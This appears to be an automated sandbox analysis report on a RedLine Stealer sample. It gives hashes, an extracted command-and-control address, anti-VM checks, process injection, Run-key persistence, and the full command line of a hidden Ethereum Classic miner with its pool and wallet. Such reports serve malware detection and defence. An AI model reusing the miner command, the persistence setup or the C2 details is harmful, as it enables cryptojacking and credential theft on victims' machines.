Analysis
-
max time kernel
160s -
max time network
137s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
29-01-2022 13:14
Static task
static1
Behavioral task
behavioral1
Sample
0ca8a68308fac722e8aa2e8c0a0016ea.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
0ca8a68308fac722e8aa2e8c0a0016ea.exe
Resource
win10-en-20211208
General
-
Target
0ca8a68308fac722e8aa2e8c0a0016ea.exe
-
Size
3.4MB
-
MD5
0ca8a68308fac722e8aa2e8c0a0016ea
-
SHA1
79963426b94a5e1badacb63522bf6df6a7909fef
-
SHA256
b2596bd49beb188627fb0ad46f87c2359d27e49b3d021e45e779cfa66eb25b75
-
SHA512
b413f31e14a34a5545ae3a30159e0f57cbfd186c498c16200da7c6d9d6ae0b2dacc38f5467bfb246f60a518a800301305354b2401aa70ba7bbfa45c760773e6d
Malware Config
Extracted
redline
5.206.227.11:63730
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1628-57-0x0000000000090000-0x00000000000B0000-memory.dmp family_redline behavioral1/memory/1628-65-0x0000000000090000-0x00000000000B0000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
1.exe2.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exepid process 1364 1.exe 1280 2.exe 1128 RegHost.exe 1844 RegHost.exe 1712 RegHost.exe 900 RegHost.exe 1848 RegHost.exe 240 RegHost.exe 1728 RegHost.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
RegHost.exeRegHost.exe1.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe -
Loads dropped DLL 18 IoCs
Processes:
AppLaunch.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 1628 AppLaunch.exe 1628 AppLaunch.exe 972 1628 AppLaunch.exe 332 explorer.exe 332 explorer.exe 276 explorer.exe 276 explorer.exe 1200 explorer.exe 1200 explorer.exe 1136 explorer.exe 1136 explorer.exe 308 explorer.exe 308 explorer.exe 1692 explorer.exe 1692 explorer.exe 276 explorer.exe 276 explorer.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\1.exe themida \Users\Admin\AppData\Local\Temp\1.exe themida C:\Users\Admin\AppData\Local\Temp\1.exe themida \Users\Admin\AppData\Local\Temp\1.exe themida behavioral1/memory/1364-71-0x000000013F810000-0x0000000140403000-memory.dmp themida behavioral1/memory/1364-73-0x000000013F810000-0x0000000140403000-memory.dmp themida behavioral1/memory/1364-78-0x000000013F810000-0x0000000140403000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\1.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1128-108-0x000000013FA10000-0x0000000140603000-memory.dmp themida behavioral1/memory/1128-109-0x000000013FA10000-0x0000000140603000-memory.dmp themida behavioral1/memory/1128-110-0x000000013FA10000-0x0000000140603000-memory.dmp themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1844-138-0x000000013F080000-0x000000013FC73000-memory.dmp themida behavioral1/memory/1844-139-0x000000013F080000-0x000000013FC73000-memory.dmp themida behavioral1/memory/1844-140-0x000000013F080000-0x000000013FC73000-memory.dmp themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exe1.exeRegHost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" 1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe -
Processes:
RegHost.exeRegHost.exeRegHost.exeRegHost.exe1.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
Processes:
bfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exepid process 1100 bfsvc.exe 1100 bfsvc.exe 1668 bfsvc.exe 1668 bfsvc.exe 524 bfsvc.exe 524 bfsvc.exe 1188 bfsvc.exe 1188 bfsvc.exe 952 bfsvc.exe 952 bfsvc.exe 992 bfsvc.exe 992 bfsvc.exe 1972 bfsvc.exe 1972 bfsvc.exe 1252 bfsvc.exe 1252 bfsvc.exe -
Suspicious use of SetThreadContext 17 IoCs
Processes:
0ca8a68308fac722e8aa2e8c0a0016ea.exe1.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription pid process target process PID 1212 set thread context of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1364 set thread context of 1100 1364 1.exe bfsvc.exe PID 1364 set thread context of 332 1364 1.exe explorer.exe PID 1128 set thread context of 1668 1128 RegHost.exe bfsvc.exe PID 1128 set thread context of 276 1128 RegHost.exe explorer.exe PID 1844 set thread context of 524 1844 RegHost.exe bfsvc.exe PID 1844 set thread context of 1200 1844 RegHost.exe explorer.exe PID 1712 set thread context of 1188 1712 RegHost.exe bfsvc.exe PID 1712 set thread context of 1136 1712 RegHost.exe explorer.exe PID 900 set thread context of 952 900 RegHost.exe bfsvc.exe PID 900 set thread context of 308 900 RegHost.exe explorer.exe PID 1848 set thread context of 992 1848 RegHost.exe bfsvc.exe PID 1848 set thread context of 1692 1848 RegHost.exe explorer.exe PID 240 set thread context of 1972 240 RegHost.exe bfsvc.exe PID 240 set thread context of 276 240 RegHost.exe explorer.exe PID 1728 set thread context of 1252 1728 RegHost.exe bfsvc.exe PID 1728 set thread context of 1844 1728 RegHost.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1544 timeout.exe 1708 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
AppLaunch.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 1628 AppLaunch.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 332 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1200 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 1136 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 308 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 1692 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe 276 explorer.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
AppLaunch.exe2.exedescription pid process Token: SeDebugPrivilege 1628 AppLaunch.exe Token: SeDebugPrivilege 1280 2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0ca8a68308fac722e8aa2e8c0a0016ea.exeAppLaunch.exe2.exe1.execmd.exedescription pid process target process PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1212 wrote to memory of 1628 1212 0ca8a68308fac722e8aa2e8c0a0016ea.exe AppLaunch.exe PID 1628 wrote to memory of 1364 1628 AppLaunch.exe 1.exe PID 1628 wrote to memory of 1364 1628 AppLaunch.exe 1.exe PID 1628 wrote to memory of 1364 1628 AppLaunch.exe 1.exe PID 1628 wrote to memory of 1364 1628 AppLaunch.exe 1.exe PID 1628 wrote to memory of 1280 1628 AppLaunch.exe 2.exe PID 1628 wrote to memory of 1280 1628 AppLaunch.exe 2.exe PID 1628 wrote to memory of 1280 1628 AppLaunch.exe 2.exe PID 1628 wrote to memory of 1280 1628 AppLaunch.exe 2.exe PID 1628 wrote to memory of 1280 1628 AppLaunch.exe 2.exe PID 1628 wrote to memory of 1280 1628 AppLaunch.exe 2.exe PID 1628 wrote to memory of 1280 1628 AppLaunch.exe 2.exe PID 1280 wrote to memory of 1636 1280 2.exe cmd.exe PID 1280 wrote to memory of 1636 1280 2.exe cmd.exe PID 1280 wrote to memory of 1636 1280 2.exe cmd.exe PID 1280 wrote to memory of 1636 1280 2.exe cmd.exe PID 1280 wrote to memory of 1636 1280 2.exe cmd.exe PID 1280 wrote to memory of 1636 1280 2.exe cmd.exe PID 1280 wrote to memory of 1636 1280 2.exe cmd.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1636 wrote to memory of 1544 1636 cmd.exe timeout.exe PID 1636 wrote to memory of 1544 1636 cmd.exe timeout.exe PID 1636 wrote to memory of 1544 1636 cmd.exe timeout.exe PID 1636 wrote to memory of 1544 1636 cmd.exe timeout.exe PID 1636 wrote to memory of 1544 1636 cmd.exe timeout.exe PID 1636 wrote to memory of 1544 1636 cmd.exe timeout.exe PID 1636 wrote to memory of 1544 1636 cmd.exe timeout.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 1100 1364 1.exe bfsvc.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe PID 1364 wrote to memory of 332 1364 1.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0ca8a68308fac722e8aa2e8c0a0016ea.exe"C:\Users\Admin\AppData\Local\Temp\0ca8a68308fac722e8aa2e8c0a0016ea.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +5004⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +5006⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +5008⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +50010⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"10⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +50012⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"12⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"13⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +50014⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"14⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"15⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +50016⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"16⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"17⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0xDE52C43Eff74263429627E5134c722e966cC16D0 -coin etc -worker Redline -cclock +500 -cvddc +50018⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Standard%20VGA%20Graphics%20Adapter" "Redline" "etc"18⤵
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C timeout 104⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 105⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C timeout 104⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 105⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
dce0f041bcb8ec758f80e9b10a1e645d
SHA1ea6bc2909ae330d72408ef0619cdcb623c30475d
SHA25613720556c2891d766fd24722c06002684e876e8d3ea4364a3ed1e98825b5fdd3
SHA512950fbaa6e2ed92380b240e3ca7e38488dadc40d92613c9d13a5805446dcd144863d0ce3f1409af2f61accb9447fdc9958332c09816143b8a1a4a433f5b0a120b
-
C:\Users\Admin\AppData\Local\Temp\1.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Local\Temp\1.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
5a2011564e7af8738d5e27adc9c092fc
SHA157641c05d00eeb816b76a1b16693099e35896578
SHA25629e38020e0c45af9e0b4a3639717422f4b41dd1d30139162c3eae50e2e38e81a
SHA512e9de4e2632dc026edec7495202336bad16e876a3322c2460fd1c0f874e8a0c822b8d66f50c6c5763d87d2d5b3ac87dc84a48490d37d4800b67fae57283c00603
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
5a2011564e7af8738d5e27adc9c092fc
SHA157641c05d00eeb816b76a1b16693099e35896578
SHA25629e38020e0c45af9e0b4a3639717422f4b41dd1d30139162c3eae50e2e38e81a
SHA512e9de4e2632dc026edec7495202336bad16e876a3322c2460fd1c0f874e8a0c822b8d66f50c6c5763d87d2d5b3ac87dc84a48490d37d4800b67fae57283c00603
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
